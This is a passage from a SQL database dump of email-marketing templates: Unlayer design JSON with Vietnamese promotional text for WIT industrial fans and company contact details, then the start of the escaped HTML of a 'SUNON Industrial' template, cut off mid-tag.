MK1X4yS\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"SLKCtEotoL\\\",\\\"contents\\\":[{\\\"id\\\":\\\"xwLkIIZRCW\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#f4f4f4\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Efymfftppu\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366476320-ddd.png\\\",\\\"width\\\":650,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f4f4f4\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"m2TKvu6Gqi\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"38nTlPeqaL\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZZdxZXscg_\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 44px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_20\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%; text-align: center;\\\\\\\">Vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng kh\\u00f4ng kh\\u00ed, ho\\u1ea1t \\u0111\\u1ed9ng b\\u1ec1n b\\u1ec9, kh\\u00f4ng ti\\u1ebfng \\u1ed3n - qu\\u1ea1t tr\\u1ea7n v\\u00e0 qu\\u1ea1t th\\u1ed5i s\\u00e0n l\\u1edbn tr\\u1edf th\\u00e0nh xu h\\u01b0\\u1edbng nhi\\u1ec1u gia \\u0111\\u00ecnh Vi\\u1ec7t Nam hi\\u1ec7n nay. Ngo\\u00e0i ra, vi\\u1ec7c s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd t\\u1ea1o gi\\u00f3 t\\u1ef1 nhi\\u00ean v\\u00e0 th\\u00f4ng tho\\u00e1ng \\u0111\\u1ed1i l\\u01b0u kh\\u00f4ng kh\\u00ed ph\\u00e2n b\\u1ed5 \\u0111\\u1ed3ng \\u0111\\u1ec1u c\\u00e1c m\\u00f9a quanh n\\u0103m, ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n c\\u1ef1c k\\u1ef3 hi\\u1ec7u qu\\u1ea3 th\\u1eddi gian s\\u1eed d\\u1ee5ng li\\u00ean t\\u1ee5c. Th\\u00eam v\\u00e0o \\u0111\\u00f3, \\u0111\\u1ec3 th\\u1ed5i s\\u00e0n ho\\u1eb7c mu\\u1ed1n c\\u00f3 lu\\u1ed3ng gi\\u00f3 th\\u1ed5i c\\u00f3 h\\u01b0\\u1edbng m\\u1ea1nh trong m\\u1ed9t kh\\u00f4ng gian l\\u1edbn th\\u00ec \\u0111\\u00e3 c\\u00f3 qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p. L\\u00fac n\\u00e0y b\\u1ea1n c\\u00f3 nhi\\u1ec1u l\\u1ef1a ch\\u1ecdn ki\\u1ec3u d\\u00e1ng qu\\u1ea1t l\\u00e0m m\\u00e1t t\\u1eeb nh\\u00e0 cung c\\u1ea5p WIT - \\u0111\\u01a1n v\\u1ecb cung c\\u1ea5p qu\\u1ea1t ch\\u1ea5t l\\u01b0\\u1ee3ng cao nh\\u1eadp kh\\u1ea9u t\\u1eeb USA, Taiwan<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"OInUiOzcj7\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#54c5cd\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 33px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"41px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>H\\u00c3Y \\u0110\\u1ec2 L\\u1ea0I TH\\u00d4NG TIN, CH\\u00daNG T\\u00d4I S\\u1ebc LI\\u00caN H\\u1ec6 T\\u01af V\\u1ea4N GI\\u00daP B\\u1ea0N<\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":519,\\\"calculatedHeight\\\":47}},{\\\"id\\\":\\\"q6Qyll203V\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"13px 44px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%; text-align: center;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 34.2px;\\\\\\\">Talk to you soon.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OlpIsMPfL1\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"V_x4C7Nw_D\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Nf_PpkTD58\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_21\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%; text-align: center;\\\\\\\"><strong><span style=\\\\\\\"font-family: \'Open Sans\', sans-serif; font-size: 28px; line-height: 39.2px;\\\\\\\">Get In Touch<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"2zqS-Vt-Lj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#e4e4eb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_22\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Talk to us 0913123860 or\\u00a0<br \\/>Email us: sale@hogiaphat.vn<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"oQrXoHNgEt\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-white\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/facebook.com\\/hgpco\\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/hogiaphatco\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\"https:\\/\\/whatsapp.com\\/hogiaphatco\\\",\\\"name\\\":\\\"WhatsApp\\\"},{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/hogiaphatco\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/hgpco\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":20,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#262c46\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"-eIptpWf32\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hDocK1PixH\\\",\\\"contents\\\":[{\\\"id\\\":\\\"uBlg6VN2LS\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"12px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_26\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%; text-align: center;\\\\\\\">\\u00a9 WIT Company. All Rights Reserved<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#1d3361\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#fbfbfb\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#5f5f8d\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '', 0, '2022-08-29 12:00:41');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(8, 'SUNON Industrial', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #363675; text-decoration: none; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #017ed0;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #017ed0;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747815584-a.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 26%;max-width: 150.8px;\\\" width=\\\"150.8\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 28px; line-height: 39.2px;\\\"><strong><span style=\\\"line-height: 39.2px; font-size: 28px;\\\">Thanks for being with us!<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 26px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" 